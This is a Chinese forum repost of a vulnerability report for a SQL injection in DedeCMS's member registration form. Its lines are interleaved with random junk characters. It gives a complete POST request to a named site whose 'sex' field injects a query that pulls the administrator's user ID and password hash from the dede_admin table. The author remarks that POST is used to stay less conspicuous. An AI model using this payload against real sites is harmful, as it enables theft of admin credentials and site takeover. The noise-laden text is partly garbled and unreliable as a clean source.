漏洞类型: SQL注射漏洞
& E X# i/ [4 F; D简要描述:# ]' w/ @- b4 A& E, y2 Y2 U ?2 a
+ z6 N' o+ q, w4 E4 B: t& p" K% }需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
- d/ _0 Q, `- c: d/ {1 V% [ O原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
2 ~! U0 I1 [: G: c& d6 ]详细说明:跟这个漏洞0 Q) i& I$ m7 o* d6 h" A7 t
- Q; a- U& p; w6 u3 @WooYun: Dedecms SQL注射导致审核机制绕过漏洞
1 g% C) q: X/ |1 n5 |" M& x$ m是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
i2 U; q* V( z3 YPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
0 p7 p- r+ j5 I- \' J
* ~ f- E( z+ R _7 T3 mwww.political-security.com/member/reg_new.php1 y1 p# V8 @% R2 ?9 g
0 h: [/ ~+ d' i. E/ O2 h& c: HPOST8 C1 p) f: P" r- D1 F
8 I1 h6 Y+ |5 n8 wdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&6 m2 n/ z Z: ]# F R' q1 b
userid=c4rp3nt3r&uname=c4rp3nt3r/ R) b5 _8 u2 D! L8 u% I
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
$ p4 I- v" t: B1 j6 {&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
4 a! H/ P4 `5 p r% O& [(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');( p* {; T% S: M7 K: v
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对